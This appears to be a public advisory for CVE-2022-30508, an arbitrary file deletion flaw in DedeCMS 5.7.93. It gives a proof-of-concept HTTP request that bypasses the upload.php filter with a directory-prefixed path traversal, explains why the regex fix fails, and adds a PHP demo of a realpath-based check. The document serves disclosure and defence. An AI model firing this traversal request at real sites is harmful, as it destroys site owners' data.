CVE-2022-30508: Vulnerability/1.md at master · 1security/Vulnerability
DedeCMS v5.7.93 was discovered to contain an arbitrary file deletion vulnerability in upload.php via the delete parameter.
DedeCMS has arbitrary file deletion
- Affected product: Dedecms 5.7.93
- Attack type: Remote
- Affected component: /dede/upload.php
- Description: DedeCMS v5.7.93 was discovered to contain an arbitrary file deletion vulnerability in upload.php via the delete parameter.
- Comment: Version 5.93 was meant to repair the arbitrary file deletion, but there is still a way to bypass the fix.
POC
The attack requires only low administrator privileges.
GET /dede/upload.php?delete=dede/../../../../../../../../../flag HTTP/1.1
Host: dedecms5793
Cookie: menuitems=1_1%2C2_1%2C3_1%2C4_1; PHPSESSID=5dmda8e360sct3jfhq5bhupfi1; _csrf_name_087a8580=71d08ef049948bbc07ae269bda502532; _csrf_name_087a85801BH21ANI1AGD297L1FF21LN02BGE1DNG=d7b9a721f2afba6c; DedeUserID=3; DedeUserID1BH21ANI1AGD297L1FF21LN02BGE1DNG=55ecf92b6c33a0e4; DedeLoginTime=1651835206; DedeLoginTime1BH21ANI1AGD297L1FF21LN02BGE1DNG=a93eb3d3f937052f; lastCid=1; lastCid1BH21ANI1AGD297L1FF21LN02BGE1DNG=2b4648712e49895f; ENV_GOBACK_URL=%2Fdede%2Fcontent_i_list.php%3Fchannelid%3D2
Details
Version 5.93 added 17 lines of code.
$delete = preg_replace("#^([.]*[/]*)*#", "", $delete);
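It can easily be bypassed by 'dede/../../../../../../../../../flag'. The pattern is anchored at the start of the string and only strips a leading run of dots and slashes, so an input that begins with a directory name is returned unchanged, with every later '../' still in place.
Then, at line 34, the file is deleted.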
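The filter quoted above next to a containment check, as an added example that is not DedeCMS code. The function names `weak_filter` and `safe_target`, the temporary directory layout, and the shortened traversal strings are assumptions constructed for the demonstration.

```php
<?php
// Added example, not DedeCMS code; function names and sandbox layout are hypothetical.

// The filter quoted on this page: strips only a leading run of dots and slashes.
function weak_filter(string $delete): string {
    return preg_replace("#^([.]*[/]*)*#", "", $delete);
}

// Hardened check: resolve the final path, then require it to stay inside $base.
function safe_target(string $base, string $delete): ?string {
    $base = realpath($base);
    if ($base === false) {
        return null;
    }
    $real = realpath($base . DIRECTORY_SEPARATOR . $delete); // false if it does not exist
    if ($real === false || !is_file($real)) {
        return null;
    }
    // Compare with a trailing separator so "/uploads-old" cannot pass for "/uploads".
    $prefix = $base . DIRECTORY_SEPARATOR;
    return strncmp($real, $prefix, strlen($prefix)) === 0 ? $real : null;
}

// Constructed sandbox: <tmp>/site/uploads/a.txt may be deleted, <tmp>/flag may not.
$root = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'del_demo_' . bin2hex(random_bytes(4));
mkdir("$root/site/uploads/dede", 0700, true);
file_put_contents("$root/site/uploads/a.txt", "upload");
file_put_contents("$root/flag", "outside the upload directory");

// Constructed inputs: a normal name, a leading traversal, a directory-prefixed traversal.
foreach (['a.txt', '../../flag', 'dede/../../../flag'] as $input) {
    $filtered = weak_filter($input);
    $target = safe_target("$root/site/uploads", $filtered);
    printf("%-20s after filter: %-20s %s\n", $input, $filtered,
        $target === null ? 'rejected' : 'allowed');
}

// Remove the sandbox.
unlink("$root/site/uploads/a.txt");
unlink("$root/flag");
foreach (['site/uploads/dede', 'site/uploads', 'site', ''] as $dir) {
    rmdir(rtrim("$root/$dir", '/'));
}
```

The third input passes through `weak_filter` unchanged, and only the resolved-path comparison in `safe_target` rejects it.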